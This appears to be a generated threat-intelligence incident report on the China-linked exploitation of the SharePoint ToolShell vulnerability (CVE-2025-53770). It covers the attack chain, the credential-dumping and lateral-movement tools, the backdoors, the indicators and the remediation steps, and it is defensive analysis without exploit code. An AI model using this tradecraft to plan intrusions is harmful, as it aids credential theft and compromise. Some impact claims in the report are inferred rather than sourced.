Full Report
Hackers believed to be associated with China have leveraged the ToolShell vulnerability (CVE-2025-53770) in Microsoft SharePoint in attacks targeting government agencies, universities, telecommunication service providers, and finance organizations. [...]
Analysis Summary
# Incident Report: Widespread Exploitation of SharePoint ToolShell Vulnerability (CVE-2025-53770)
## Executive Summary
Cyber actors, believed to be associated with China, leveraged the actively exploited zero-day vulnerability CVE-2025-53770 (ToolShell) in unpatched Microsoft SharePoint servers to gain remote, unauthenticated code execution across various sectors globally. The attacks, which began around July 20, 2025, impacted government agencies, universities, telecom providers, and financial institutions across four continents. Response included Microsoft releasing emergency patches, though post-exploitation activity involved complex multi-stage malware deployment, including custom backdoors and standard post-exploitation tools.
## Incident Details
- Discovery Date: July 20, 2025 (Date the zero-day was disclosed/actively exploited)
- Incident Date: Beginning around July 20, 2025
- Affected Organization: Government agencies, universities, telecommunication service providers, and finance organizations across the Middle East, South America, the U.S., and Africa.
- Sector: Government, Education, Telecommunications, Finance
- Geography: Worldwide (Four continents: Middle East, South America, USA, Africa, and at least one European finance company mentioned).
## Timeline of Events
### Initial Access
- Date/Time: Starting July 20, 2025 (Exploitation disclosed/began)
- Vector: Exploitation of **CVE-2025-53770 (ToolShell)** in on-premise Microsoft SharePoint servers.
- Details: This vulnerability bypasses protections related to CVE-2025-49706 and CVE-2025-49704, allowing remote, unauthenticated Remote Code Execution (RCE) and full file system access. Targeting of a Middle Eastern telecom firm began specifically on July 21, 2025.
### Lateral Movement
- Details: Attackers performed credential dumping using tools like **ProcDump, Minidump, and LsassDumper**. They leveraged **PetitPotam (CVE-2021-36942)** for domain compromise.
### Data Exfiltration/Impact
- Details: Data collection involved using the **Renecks utility** (which supports data exfiltration), system information gathering, and potentially the theft of credentials. The ultimate impact involved establishing a long-term foothold using advanced malware frameworks.
### Detection & Response
- Date/Time: July 21, 2025 (Microsoft released emergency updates). Organizations like Symantec began detailed reporting later.
- Details: Microsoft issued emergency updates the day after the flaw was disclosed. Symantec tracked the ongoing campaign, noting the use of malware associated with the known Chinese threat group Salt Typhoon.
## Attack Methodology
- Initial Access: **CVE-2025-53770 (ToolShell)** for unauthenticated RCE.
- Persistence: **Webshells** planted immediately after initial access, followed by the deployment of the **Zingdoor** backdoor and use of the **Renecks utility**.
- Privilege Escalation: Techniques were implicitly achieved via RCE/filesystem access, and potentially involving subsequent credential dumping efforts.
- Defense Evasion: **DLL side-loading** using legitimate executables (Trend Micro and BitDefender files) to conceal malicious activity.
- Credential Access: **ProcDump, Minidump, and LsassDumper** used for credential harvesting.
- Discovery: Attackers utilized the **GoGo Scanner** (a red-team scanning engine).
- Lateral Movement: **PetitPotam (CVE-2021-36942)** for domain compromise.
- Collection: **Zingdoor** backdoor used for system info collection and file operations.
- Exfiltration: **Renecks utility** used to allow data exfiltration.
- Impact: Deployment of the **ShadowPad Trojan** and the **KrustyLoader** tool, which subsequently deployed the **Sliver** open-source post-exploitation framework.
## Impact Assessment
- Financial: (Not explicitly stated, but implied significant costs for remediation and potential downtime/regulatory fines).
- Data Breach: System information gathered; sensitive data likely accessed during credential dumping and exfiltration targeting entities in government, finance, and telecom sectors.
- Operational: Disruption due to webshell deployment and introduction of sophisticated backdoors (ShadowPad, Sliver).
- Reputational: High risk due to targeting of government and core infrastructure providers.
## Indicators of Compromise
- **Network indicators (Defanged):** Traffic associated with Sliver C2, commands sent via Renecks utility.
- **File indicators:** Webshells, Zingdoor backdoor (Go-based), KrustyLoader (Rust-based), Sliver framework components.
- **Behavioral indicators:** DLL side-loading using Trend Micro/BitDefender executables, use of `certutil.exe`, execution of ProcDump/LsassDumper.
## Response Actions
- Containment measures: Implied actions would include isolating affected SharePoint servers and patching immediately. (Note: Microsoft released patches the day after disclosure).
- Eradication steps: Removal of planted webshells, identification and termination of associated malware processes (Zingdoor, KrustyLoader, Sliver), and analysis of compromised file systems.
- Recovery actions: Full restoration of SharePoint farm integrity, potentially rebuilding compromised systems, and mandatory password resets following credential dumping.
## Lessons Learned
- The vulnerability management program failed to protect against a critical, actively exploited zero-day (CVE-2025-53770) which allowed unauthenticated RCE.
- Attackers are utilizing multiple linked Chinese threat group toolsets (Budworm, Sheathminer, Storm-2603) in coordinated sophisticated campaigns.
- Sophisticated evasion tactics, such as DLL side-loading using legitimate vendor software, are effective at bypassing standard endpoint controls.
## Recommendations
- Immediately apply the emergency patches released by Microsoft for CVE-2025-53770 and related flaws across all on-premise SharePoint environments.
- Implement strict network segmentation for all public-facing servers, especially SharePoint, to limit lateral movement potential should initial access occur.
- Enhance monitoring for anomalous process execution chained with legitimate vendor executables (e.g., monitoring for DLL loading from non-standard directories).
- Conduct thorough threat-hunting across the enterprise for known indicators associated with Salt Typhoon tooling (Zingdoor, Sliver).